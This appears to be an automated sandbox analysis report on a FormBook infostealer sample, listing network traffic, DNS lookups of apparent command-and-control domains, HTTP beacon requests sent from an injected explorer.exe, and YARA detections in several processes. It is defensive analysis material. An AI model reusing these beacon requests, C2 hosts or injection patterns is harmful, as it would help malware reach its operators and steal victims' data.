                        Nov 25, 2021 15:11:41.411189079 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.434387922 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.436362982 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.436557055 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.456016064 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.456082106 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.456110954 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:41.456293106 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.456537008 CET4980180192.168.2.63.64.163.50
                        Nov 25, 2021 15:11:41.475897074 CET80498013.64.163.50192.168.2.6
                        Nov 25, 2021 15:11:46.683671951 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:46.852204084 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:46.852335930 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:46.852530956 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:47.031126976 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:47.031146049 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:47.031155109 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:11:47.031323910 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:47.031456947 CET4982180192.168.2.6142.252.22.166
                        Nov 25, 2021 15:11:47.201138973 CET8049821142.252.22.166192.168.2.6
                        Nov 25, 2021 15:12:02.310941935 CET4982580192.168.2.6209.17.116.163
                        Nov 25, 2021 15:12:05.311918974 CET4982580192.168.2.6209.17.116.163
                        Nov 25, 2021 15:12:11.312515974 CET4982580192.168.2.6209.17.116.163
                        Nov 25, 2021 15:12:23.998922110 CET4984980192.168.2.6209.17.116.163

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 15:11:34.718662977 CET5378153192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:35.732012987 CET5378153192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:35.928148031 CET53537818.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:39.736213923 CET53537818.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:41.348179102 CET5498253192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:41.409744024 CET53549828.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:46.591064930 CET6371853192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:46.682406902 CET53637188.8.8.8192.168.2.6
                        Nov 25, 2021 15:11:57.075520992 CET6211653192.168.2.68.8.8.8
                        Nov 25, 2021 15:11:57.112966061 CET53621168.8.8.8192.168.2.6
                        Nov 25, 2021 15:12:02.135910988 CET6381653192.168.2.68.8.8.8
                        Nov 25, 2021 15:12:02.309823036 CET53638168.8.8.8192.168.2.6
                        Nov 25, 2021 15:12:23.801845074 CET6220853192.168.2.68.8.8.8
                        Nov 25, 2021 15:12:23.989738941 CET53622088.8.8.8192.168.2.6

                        ICMP Packets

                        TimestampSource IPDest IPChecksumCodeType
                        Nov 25, 2021 15:11:39.736402035 CET192.168.2.68.8.8.8cff3(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Nov 25, 2021 15:11:34.718662977 CET192.168.2.68.8.8.80xa06cStandard query (0)www.qzttb.netA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:35.732012987 CET192.168.2.68.8.8.80xa06cStandard query (0)www.qzttb.netA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:41.348179102 CET192.168.2.68.8.8.80xe11fStandard query (0)www.royaldears.comA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:46.591064930 CET192.168.2.68.8.8.80x209cStandard query (0)www.dragonmodz.netA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:57.075520992 CET192.168.2.68.8.8.80x35bbStandard query (0)www.blueprintroslyn.comA (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:02.135910988 CET192.168.2.68.8.8.80x140Standard query (0)www.pittsburghdata.centerA (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:23.801845074 CET192.168.2.68.8.8.80xe244Standard query (0)www.pittsburghdata.centerA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Nov 25, 2021 15:11:35.928148031 CET8.8.8.8192.168.2.60xa06cNo error (0)www.qzttb.net154.94.210.101A (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:39.736213923 CET8.8.8.8192.168.2.60xa06cServer failure (2)www.qzttb.netnonenoneA (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:41.409744024 CET8.8.8.8192.168.2.60xe11fNo error (0)www.royaldears.com3.64.163.50A (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:46.682406902 CET8.8.8.8192.168.2.60x209cNo error (0)www.dragonmodz.net142.252.22.166A (IP address)IN (0x0001)
                        Nov 25, 2021 15:11:57.112966061 CET8.8.8.8192.168.2.60x35bbName error (3)www.blueprintroslyn.comnonenoneA (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:02.309823036 CET8.8.8.8192.168.2.60x140No error (0)www.pittsburghdata.center209.17.116.163A (IP address)IN (0x0001)
                        Nov 25, 2021 15:12:23.989738941 CET8.8.8.8192.168.2.60xe244No error (0)www.pittsburghdata.center209.17.116.163A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.qzttb.net
                        • www.royaldears.com
                        • www.dragonmodz.net

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.649779154.94.210.10180C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 25, 2021 15:11:36.125092030 CET11598OUTGET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1
                        Host: www.qzttb.net
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:36.336148024 CET12007INHTTP/1.1 404 Not Found
                        Content-Type: text/html; charset=utf-8
                        Server: Microsoft-IIS/10.0
                        X-Powered-By: PHP/7.0.33
                        X-Powered-By: ASP.NET
                        Date: Thu, 25 Nov 2021 14:11:35 GMT
                        Connection: close
                        Content-Length: 7447
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20
                        Data Ascii: <!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold;


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.6498013.64.163.5080C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 25, 2021 15:11:41.436557055 CET15048OUTGET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1
                        Host: www.royaldears.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:41.456082106 CET15049INHTTP/1.1 410 Gone
                        Server: openresty
                        Date: Thu, 25 Nov 2021 14:11:41 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6f 79 61 6c 64 65 61 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6f 79 61 6c 64 65 61 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.royaldears.com/' />a </head>9 <body>3a You are being redirected to http://www.royaldears.coma </body>8</html>0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.649821142.252.22.16680C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 25, 2021 15:11:46.852530956 CET16564OUTGET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1
                        Host: www.dragonmodz.net
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:47.031126976 CET16565INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 25 Nov 2021 14:11:46 GMT
                        Content-Type: text/html
                        Content-Length: 1886
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba a3 b6 ab c3 c3 ba b1 c6 fb b3 b5 ce ac d0 de cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 2c 26 23 32 33 35 34 35 3b 26 23 33 30 35 32 38 3b 26 23 33 38 32 33 36 3b 26 23 32 33 33 37 36 3b 26 23 32 31 35 31 38 3b 26 23 32 30 38 33 37 3b 26 23 32 33 35 36 37 3b 26 23 32 38 31 36 35 3b 26 23 32 36 30 33 32 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 2c 26 23 32 33 35 34 35 3b 26 23 33 30 35 32 38 3b 26 23 33 38 32 33 36 3b 26 23 32 33 33 37 36 3b 26 23 32 31 35 31 38 3b 26 23 32 30 38 33 37 3b 26 23 32 33 35 36 37 3b 26 23 32 38 31 36 35 3b 26 23 32 36 30 33 32 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26
                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&#21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#21697;</title><meta name="keywords" content="&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&#21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#21697;" /><meta name="description" content="&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:15:10:13
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
                        Imagebase:0x8e0000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:15:10:16
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Imagebase:0x2f0000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:15:10:18
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Imagebase:0x560000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:15:10:20
                        Start date:25/11/2021
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6f22f0000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:15:10:53
                        Start date:25/11/2021
                        Path:C:\Windows\SysWOW64\netsh.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\netsh.exe
                        Imagebase:0x9e0000
                        File size:82944 bytes
                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: Joe Security
